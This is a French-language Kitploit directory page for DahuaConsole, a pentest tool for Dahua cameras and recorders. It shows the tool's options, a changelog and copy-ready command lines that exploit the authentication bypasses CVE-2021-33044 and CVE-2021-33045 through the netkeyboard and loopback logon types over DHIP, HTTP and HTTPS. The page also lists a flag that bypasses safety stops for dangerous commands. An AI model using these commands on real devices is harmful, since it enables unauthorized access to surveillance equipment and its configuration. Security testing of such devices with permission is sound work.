Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
DahuaConsole — Dahua Console, accédez à la console de débogage interne et/ou à d'autres fonctions étudiées sur les appareils Dahua. N'hésitez pas à contribuer à ce projet. | Kitploit
Outils/GitHubGitHub/mcw0/dahuaconsole
Authentification et AutorisationSécurité des Systèmes EmbarquésReconnaissanceSécurité IoTAnalyse des VulnérabilitésExploitationCollecte d'InformationsTests d'Intrusion
GitHubmcw0/dahuaconsole

DahuaConsole

Dahua Console, accédez à la console de débogage interne et/ou à d'autres fonctions étudiées sur les appareils Dahua. N'hésitez pas à contribuer à ce projet.

316795il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
Partager

Dahua Console

  • Version : Pré-alpha
  • Bugs : En effet
  • TODO : Beaucoup de choses

[Installer les prérequis]

root@kitploit:~
sudo pip3 install -r requirements.txt

[Arguments]

root@kitploit:~
  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://<username>:<password>@<host>:<port>
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[Version]

[Mise à jour] 2022-07-10

  • Ajout de la méthode de connexion 3des_old pour le VTH1510CH exécutant le logiciel V2 de 2016
    • Différence mineure dans les données du paquet de connexion
    • Ne pas interroger les paramètres de l'appareil à la connexion - cela réinitialisera la connexion
  • Ajout de --restore config-file.json
    • Charge le fichier de configuration json ou certaines de ses parties.

Exemple :

./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config

[Mise à jour]

2021-10-07

Détails ici : https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Protocole requis : DHIP ou HTTP/HTTPS (DHIP ne fonctionne pas avec TLS/SSL @TCP/443)

root@kitploit:~
[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Protocole requis : DHIP (DHIP ne fonctionne pas avec TLS/SSL @TCP/443)

root@kitploit:~
[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

Télécharger l’outil